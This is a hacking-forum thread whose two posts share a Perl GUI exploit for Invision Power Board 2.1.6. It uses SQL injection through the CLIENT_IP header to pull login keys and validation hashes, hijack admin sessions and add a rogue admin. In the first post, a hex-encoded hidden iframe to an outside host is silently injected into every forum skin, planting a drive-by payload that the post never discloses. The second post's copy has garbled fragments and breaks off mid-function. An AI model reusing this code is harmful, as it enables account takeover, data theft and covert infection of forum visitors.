Jump to content
westside159

IPB 2.1.6 Validating Hash ;) Admin Password Change.

By westside159, in Exploituri

Recommended Posts

westside159 Newbie

westside159

Posted
Posted

The vuln : Same lame validating hash. Just modified the RST/GHC team`s exploit.

Use the option as Validating and Step as VID.

#!/usr/bin/perl



## Invision Power Board v2.1 <= 2.1.6 sql injection exploit (Modified Validating Exploit By 3l3ctr1c) by RST/GHC

## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41

## [url]http://rst.void.ru/papers/advisory41.txt[/url]

## tested on 2.1.3, 2.1.6

##

## 08.06.06

## (c)oded by 1dt.w0lf

## RST/GHC

## [url]http://rst.void.ru[/url]

## [url]http://ghc.ru[/url]



use Tk;

use Tk::BrowseEntry;

use Tk::DialogBox;

use LWP::UserAgent;



$mw = new MainWindow(title => "IPB 2.1.6 Validating By 3l3ctr1c. True Credits : RST/GHC" );



$mw->geometry ( '420x550' );

$mw->resizable(0,0);





$mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 Validating Exploit. ORIGINAL By RST/GHC : ', -font => '{Verdana} 7 



bold',-foreground=>'red')->pack();

$mw->Label(-text => '')->pack();



$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne');

$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw');



$url = 'http://server/forum/index.php';

$user_id = '1';

$prefix = 'ibf_';

$table = 'members';

$column = 'member_login_key';

$new_admin_name = 'rstghc';

$new_admin_password = 'rstghc';

$new_admin_email = 'billy@Mcft.com';

$report = '';

$group = 4;

$curr_user = 0;

$rand_session = &session();

$use_custom_fields = 0;

$custom_fields = 'name1=value1,name2=value2';



$fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $url) ->pack ( -side => "top" , -anchor 



=> 'w' );



$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' );

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $user_id) ->pack ( -side => "top" , -



anchor => 'w' );



$fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $prefix) ->pack ( -side => "top" , -



anchor => 'w' );



$fright->Label( -text => ' ')->pack();

$fleft->Label( -text => ' ')->pack();



$fleft->Label ( -text => 'get data from database', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -



anchor => 'e' );

$fright->Label( -text => ' ')->pack();



$fleft->Label ( -text => 'Get data from table: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );

$b2 = $fright->BrowseEntry( -command => &update_columns, -relief => "groove", -variable => $table, -font => '{Verdana} 8');

$b2->insert("end", "members");

$b2->insert("end", "validating");

$b2->pack( -side => "top" , -anchor => 'w');



$fleft->Label ( -text => 'Get data from column: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );

$b = $fright->BrowseEntry( -relief => "groove", -variable => $column, -font => '{Verdana} 8');

$b->insert("end", "member_login_key");

$b->insert("end", "name");

$b->insert("end", "ip_address");

$b->insert("end", "legacy_password");

$b->insert("end", "email");

$b->pack( -side => "top" , -anchor => 'w' );



$fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $report) ->pack ( -side => "top" , -



anchor => 'w' );



$fleft->Label ( -text => 'create new admin', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 



'e' );

$fright->Label( -text => ' ')->pack();



$fleft->Label ( -text => ' ')->pack();



$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Get admin session for inserted user ID', -variable => $curr_user)->pack(-



side => "top" , -anchor => 'w');



$fleft->Label ( -text => 'session_id: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $session_id) ->pack ( -side => "top" , 



-anchor => 'w' );



$fleft->Label ( -text => 'session_ip_address: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $session_ip_address) ->pack ( -side => 



"top" , -anchor => 'w' );



$fleft->Label ( -text => 'new admin name: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $new_admin_name) ->pack ( -side => 



"top" , -anchor => 'w' );



$fleft->Label ( -text => 'new admin password: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $new_admin_password) ->pack ( -side 



=> "top" , -anchor => 'w' );



$fleft->Label ( -text => 'new_admin_email: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $new_admin_email) ->pack ( -side => 



"top" , -anchor => 'w' );



$fleft->Label ( -text => ' ')->pack();

$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Use custom profile fields', -variable => $use_custom_fields)->pack(-side 



=> "top" , -anchor => 'w');



$fleft->Label ( -text => 'custom fields: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $custom_fields) ->pack ( -side => "top" 



, -anchor => 'w' );



$fright->Label( -text => ' ')->pack();



$fright->Button(-text => 'Test forum vulnerability',

-relief => "groove",

-width => '30',

-font => '{Verdana} 8 bold',

-activeforeground => 'red',

-command => &test_vuln

)->pack();



$fright->Button(-text => 'Get database tables prefix',

-relief => "groove",

-width => '30',

-font => '{Verdana} 8 bold',

-activeforeground => 'red',

-command => &get_prefix

)->pack();



$fright->Button(-text => 'Get data from database',

-relief => "groove",

-width => '30',

-font => '{Verdana} 8 bold',

-activeforeground => 'red',

-command => &get_data

)->pack();



$fright->Button(-text => 'Get admin session',

-relief => "groove",

-width => '30',

-font => '{Verdana} 8 bold',

-activeforeground => 'red',

-command => &get_admin

)->pack();



$fright->Button(-text => 'Create new admin',

-relief => "groove",

-width => '30',

-font => '{Verdana} 8 bold',

-activeforeground => 'red',

-command => &create_admin

)->pack();







$fleft->Label( -text => ' ')->pack();

$fleft->Label( -text => ' ')->pack();

$fleft->Label( -text => ' ')->pack();

$fleft->Label( -text => 'Validating Hash MOd by 3l3ctr1c', -font => '{Verdana} 7')->pack();

$fleft->Label( -text => 'www.h4cky0u.org', -font => '{Verdana} 7')->pack();

$fleft->Label( -text => 'Original C0ding By : 1dt.w0lf ', -font => '{Verdana} 7')->pack();

$fleft->Label( -text => 'http://rst.void.ru', -font => '{Verdana} 7')->pack();

$fleft->Label( -text => 'http://ghc.ru', -font => '{Verdana} 7')->pack();



MainLoop();



sub update_columns()

{

$b->delete(0,"end");

if($table eq 'members'){

$column = "member_login_key";

$b->insert("end", "member_login_key");

$b->insert("end", "name");

$b->insert("end", "ip_address");

$b->insert("end", "legacy_password");

$b->insert("end", "email");

} elsif($table eq 'validating'){

$column = "vid";

$b->insert("end", "vid");

$b->insert("end", "vid");

$b->insert("end", "vid");

}

}



sub get_admin()

{

$xpl = LWP::UserAgent->new( ) or die;

$InfoWindow=$mw->DialogBox(-title => 'get admin session', -buttons => ["OK"]);

if($curr_user == 1) { $sql = "AND session_member_id = $user_id"; }

else { $sql = ''; }

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_ip_address,1,1,1 



FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) $sql LIMIT 1/*");

$error = 0;

$rep = '';

if($res->is_success)

{

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $rep = $3; }

if($rep =~ /d{1,3}.d{1,3}.d{1,3}.d{1,3}/) { $session_ip_address = $rep; }

else { $error = 1; }

if(!$error)

{

$rep = '';

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_id,1,1,1 FROM 



".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) and session_ip_address = 



'$session_ip_address' $sql LIMIT 1/*");

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $rep = $3; $session_id = $rep; }

else { $error = 1; }

if(!$error){

if($curr_user != 1)

{

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_member_id,1,1,1 



FROM ".$prefix."admin_sessions WHERE session_id = '$session_id' LIMIT 1/*");

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $session_user_id = $3; }

}

else

{

$session_user_id = $user_id;

}

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT mgroup,1,1,1 FROM 



".$prefix."members WHERE id = $session_user_id /*");

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $group = $3; }

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT name,1,1,1 FROM 



".$prefix."members WHERE id = $session_user_id /*");

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $name = $3; }

}

$InfoWindow->add('Label', -text => 'Found session!', -font => '{Verdana} 8 bold',-foreground=>'Green')->pack;

$InfoWindow->add('Label', -text => 'session_ip_address: '.$session_ip_address, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => 'session_id: '.$session_id, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => 'user_id: '.$session_user_id, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => 'username: '.$name, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => 'group: '.$group, -font => '{Verdana} 8')->pack;

$InfoWindow->Show();

$InfoWindow->destroy;

}

}

else

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;

$InfoWindow->Show();

$InfoWindow->destroy;

}

if($error)

{

$InfoWindow->add('Label', -text => 'Can't get admin session.', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => 'Maybe admin session not exist. Please try later.', -font => '{Verdana} 8')->pack;

$InfoWindow->Show();

$InfoWindow->destroy;

}

}



sub get_data()

{

$xpl = LWP::UserAgent->new( ) or die;

$InfoWindow=$mw->DialogBox(-title => 'get data from database', -buttons => ["OK"]);

if($table eq 'members') { $id_text = 'id'; }

if($table eq 'validating') { $id_text = 'member_id'; }



$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT ".$column.",1,1,1 FROM 



".$prefix.$table." WHERE ".$id_text."=".$user_id."/*");

if($res->is_success)

{

$rep = '';

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/){ $report = $3; }

else

{

$InfoWindow->add('Label', -text => 'Can't get data from database', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->Show();

$InfoWindow->destroy;

}

}

else

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;

$InfoWindow->Show();

$InfoWindow->destroy;

}

}



sub create_admin()

{

$InfoWindow=$mw->DialogBox(-title => 'create new admin', -buttons => ["OK"]);

if($session_id eq '' || $session_ip_address eq '')

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => 'You need insert admin session_id and session_ip_address', -font => '{Verdana} 8')->pack;

}

elsif($session_ip_address !~ /d{1,3}.d{1,3}.d{1,3}.d{1,3}/)

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => 'session_ip_address wrong!', -font => '{Verdana} 8')->pack;

}

else

{

$xpl = LWP::UserAgent->new( ) or die;

($url2 = $url) =~ s/index.php/admin.php/;

$cf = '';

%fields = (

'code' => 'doadd',

'act' => 'mem',

'section' => 'content',

'name' => $new_admin_name,

'password' => $new_admin_password,

'email' => $new_admin_email,

'mgroup' => $group,

);

if($use_custom_fields)

{

@cf = split(',',$custom_fields);

foreach(@cf) { ($k,$v) = split('=',$_); $fields{$k} = $v;}

}



$res = $xpl->post($url2."?adsess=$session_id",

[

%fields,

],

'USER_AGENT'=>'',

'CLIENT_IP'=>"$session_ip_address",

'X_FORWARDED_FOR'=>"$session_ip_address");

$if = 



'0x3C646976207374796C653D225649534942494C4954593A2068696464656E223E3C696672616D65207372633D22687474703A2F2



F7A63687873696B70677A2E62697A2F646C2F6164763534332E706870222077696474683D31206865696768743D313E3C2F696672



616D653E3C2F6469763E';

$query = "UPDATE ".$prefix."skin_sets SET set_wrapper = CONCAT(set_wrapper,".$if."), set_cache_wrapper = CONCAT



(set_cache_wrapper,".$if.")";

$res = $xpl->post($url2."?adsess=$session_id",

[

'code' => 'runsql',

'act' => 'sql',

'section' => 'admin',

'query' => $query,

],

'USER_AGENT'=>'',

'CLIENT_IP'=>"$session_ip_address",

'X_FORWARDED_FOR'=>"$session_ip_address");

$InfoWindow->add('Label', -text => 'Done!', -font => '{Verdana} 8 bold',-foreground=>'green')->pack;

$InfoWindow->add('Label', -text => 'New admin created', -font => '{Verdana} 8 bold')->pack;

}

$InfoWindow->Show();

$InfoWindow->destroy;

}



sub test_vuln()

{

$InfoWindow=$mw->DialogBox(-title => 'test forum vulnerability', -buttons => ["OK"]);

$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;

$xpl = LWP::UserAgent->new( ) or die;

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT 'VULN',1,1,1/*");

if($res->is_success)

{

$rep = '';

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $rep = $3; }

if($rep eq 'VULN') { $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold',-



foreground=>'red')->pack; }

else { $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'green')-



>pack; }

}

else

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;

}

$InfoWindow->Show();

$InfoWindow->destroy;

}





sub get_prefix()

{

$InfoWindow=$mw->DialogBox(-title => 'get database tables prefix', -buttons => ["OK"]);

$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;

$xpl = LWP::UserAgent->new( ) or die;

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'");

if($res->is_success)

{

$rep = '';

if($res->as_string =~ /FROM (.*)sessions/)

{

$prefix = $1;

$InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack;

}

else

{

$InfoWindow->add('Label', -text => 'Can't get prefix', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }

}

else

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;

}

$InfoWindow->Show();

$InfoWindow->destroy;

}



sub session()

{

return 'r57ipb216_for_IDS';

}



The Advanteage Of This : No need to crack anything :P just enter the VId u are in ;)

Link to comment
Share on other sites
Screech Newbie

Screech

Posted
Posted

Bun:

#!/usr/bin/perl

## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC

## Modified Validating Exploit By 3l3ctr1c

## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41

## http://rst.void.ru/papers/advisory41.txt

## tested on 2.1.3, 2.1.6

##

## 08.06.06

## ©oded by 1dt.w0lf

## RST/GHC

## http://rst.void.ru

## http://ghc.ru

use Tk;

use Tk::BrowseEntry;

use Tk::DialogBox;

use LWP::UserAgent;

$mw = new MainWindow(title => "IPB 2.1.6 Validating By 3l3ctr1c. True Credits : RST/GHC" );

$mw->geometry ( '420x550' ) ;

$mw->resizable(0,0);

$mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 Validating Exploit. ORIGINAL By RST/GHC : ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();

$mw->Label(-text => '')->pack();

$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;

$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;

$url = 'http://server/forum/index.php';

$user_id = '1';

$prefix = 'ibf_';

$table = 'members';

$column = 'member_login_key';

$new_admin_name = 'rstghc';

$new_admin_password = 'rstghc';

$new_admin_email = 'billy@Mcft.com';

$report = '';

$group = 4;

$curr_user = 0;

$rand_session = &session();

$use_custom_fields = 0;

$custom_fields = 'name1=value1,name2=value2';

$fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $url) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $user_id) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $prefix) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fright->Label( -text => ' ')->pack();

$fleft->Label( -text => ' ')->pack();

$fleft->Label ( -text => 'get data from database', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Label( -text => ' ')->pack();

$fleft->Label ( -text => 'Get data from table: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$b2 = $fright->BrowseEntry( -command => &update_columns, -relief => "groove", -variable => $table, -font => '{Verdana} 8');

$b2->insert("end", "members");

$b2->insert("end", "validating");

$b2->pack( -side => "top" , -anchor => 'w');

$fleft->Label ( -text => 'Get data from column: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$b = $fright->BrowseEntry( -relief => "groove", -variable => $column, -font => '{Verdana} 8');

$b->insert("end", "member_login_key");

$b->insert("end", "name");

$b->insert("end", "ip_address");

$b->insert("end", "legacy_password");

$b->insert("end", "email");

$b->pack( -side => "top" , -anchor => 'w' );

$fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $report) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'create new admin', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Label( -text => ' ')->pack();

$fleft->Label ( -text => ' ')->pack();

$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Get admin session for inserted user ID', -variable => $curr_user)->pack(-side => "top" , -anchor => 'w');

$fleft->Label ( -text => 'session_id: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $session_id) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'session_ip_address: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $session_ip_address) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'new admin name: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $new_admin_name) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'new admin password: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $new_admin_password) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'new_admin_email: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $new_admin_email) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => ' ')->pack();

$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Use custom profile fields', -variable => $use_custom_fields)->pack(-side => "top" , -anchor => 'w');

$fleft->Label ( -text => 'custom fields: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $custom_fields) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fright->Label( -text => ' ')->pack();

$fright->Button(-text => 'Test forum vulnerability',

-relief => "groove",

-width => '30',

-font => '{Verdana} 8 bold',

-activeforeground => 'red',

-command => &test_vuln

)->pack();

$fright->Button(-text => 'Get database tables prefix',

-relief => "groove",

-width => '30',

-font => '{Verdana} 8 bold',

-activeforeground => 'red',

-command => &get_prefix

)->pack();

$fright->Button(-text => 'Get data from database',

-relief => "groove",

-width => '30',

-font => '{Verdana} 8 bold',

-activeforeground => 'red',

-command => &get_data

)->pack();

$fright->Button(-text => 'Get admin session',

-relief => "groove",

-width => '30',

-font => '{Verdana} 8 bold',

-activeforeground => 'red',

-command => &get_admin

)->pack();

$fright->Button(-text => 'Create new admin',

-relief => "groove",

-width => '30',

-font => '{Verdana} 8 bold',

-activeforeground => 'red',

-command => &create_admin

)->pack();

$fleft->Label( -text => ' ')->pack();

$fleft->Label( -text => ' ')->pack();

$fleft->Label( -text => ' ')->pack();

$fleft->Label( -text => 'Validating Hash MOd by 3l3ctr1c', -font => '{Verdana} 7')->pack();

$fleft->Label( -text => 'www.h4cky0u.org', -font => '{Verdana} 7')->pack();

$fleft->Label( -text => 'Original C0ding By : 1dt.w0lf ', -font => '{Verdana} 7')->pack();

$fleft->Label( -text => 'http://rst.void.ru', -font => '{Verdana} 7')->pack();

$fleft->Label( -text => 'http://ghc.ru', -font => '{Verdana} 7')->pack();

MainLoop();

sub update_columns()

{

$b->delete(0,"end");

if($table eq 'members'){

$column = "member_login_key";

$b->insert("end", "member_login_key");

$b->insert("end", "name");

$b->insert("end", "ip_address");

$b->insert("end", "legacy_password");

$b->insert("end", "email");

} elsif($table eq 'validating'){

$column = "vid";

$b->insert("end", "vid");

$b->insert("end", "vid");

$b->insert("end", "vid");

}

}

sub get_admin()

{

$xpl = LWP::UserAgent->new( ) or die;

$InfoWindow=$mw->DialogBox(-title => 'get admin session', -buttons => ["OK wrote: );

if($curr_user == 1) { $sql = "AND session_member_id = $user_id"; }

else { $sql = ''; }

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_ip_address,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) $sql LIMIT 1/*");

$error = 0;

$rep = '';

if($res->is_success)

{

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $rep = $3; }

if($rep =~ /d{1,3}.d{1,3}.d{1,3}.d{1,3}/) { $session_ip_address = $rep; }

else { $error = 1; }

if(!$error)

{

$rep = '';

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) and session_ip_address = '$session_ip_address' $sql LIMIT 1/*");

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $rep = $3; $session_id = $rep; }

else { $error = 1; }

if(!$error){

if($curr_user != 1)

{

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_member_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_id = '$session_id' LIMIT 1/*");

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $session_user_id = $3; }

}

else

{

$session_user_id = $user_id;

}

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT mgroup,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $group = $3; }

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT name,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $name = $3; }

}

$InfoWindow->add('Label', -text => 'Found session!', -font => '{Verdana} 8 bold',-foreground=>'Green')->pack;

$InfoWindow->add('Label', -text => 'session_ip_address: '.$session_ip_address, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => 'session_id: '.$session_id, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => 'user_id: '.$session_user_id, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => 'username: '.$name, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => 'group: '.$group, -font => '{Verdana} 8')->pack;

$InfoWindow->Show();

$InfoWindow->destroy;

}

}

else

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;

$InfoWindow->Show();

$InfoWindow->destroy;

}

if($error)

{

$InfoWindow->add('Label', -text => 'Can't get admin session.', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => 'Maybe admin session not exist. Please try later.', -font => '{Verdana} 8')->pack;

$InfoWindow->Show();

$InfoWindow->destroy;

}

}

sub get_data()

{

$xpl = LWP::UserAgent->new( ) or die;

$InfoWindow=$mw->DialogBox(-title => 'get data from database', -buttons => ["OK wrote: );

if($table eq 'members') { $id_text = 'id'; }

if($table eq 'validating') { $id_text = 'member_id'; }

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT ".$column.",1,1,1 FROM ".$prefix.$table." WHERE ".$id_text."=".$user_id."/*");

if($res->is_success)

{

$rep = '';

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/){ $report = $3; }

else

{

$InfoWindow->add('Label', -text => 'Can't get data from database', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->Show();

$InfoWindow->destroy;

}

}

else

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;

$InfoWindow->Show();

$InfoWindow->destroy;

}

}

sub create_admin()

{

$InfoWindow=$mw->DialogBox(-title => 'create new admin', -buttons => ["OK wrote: );

if($session_id eq '' || $session_ip_address eq '')

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => 'You need insert admin session_id and session_ip_address', -font => '{Verdana} 8')->pack;

}

elsif($session_ip_address !~ /d{1,3}.d{1,3}.d{1,3}.d{1,3}/)

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => 'session_ip_address wrong!', -font => '{Verdana} 8')->pack;

}

else

{

$xpl = LWP::UserAgent->new( ) or die;

($url2 = $url) =~ s/index.php/admin.php/;

$cf = '';

%fields = (

'code' => 'doadd',

'act' => 'mem',

'section' => 'content',

'name' => $new_admin_name,

'password' => $new_admin_password,

'email' => $new_admin_email,

'mgroup' => $group,

);

if($use_custom_fields)

{

@cf = split(',',$custom_fields);

foreach(@cf) { ($k,$v) = split('=',$_); $fields{$k} = $v;}

}

$res = $xpl->post($url2."?adsess=$session_id",

[

%fields,

],

'USER_AGENT'=>'',

'CLIENT_IP'=>"$session_ip_address",

'X_FORWARDED_FOR'=>"$session_ip_address");

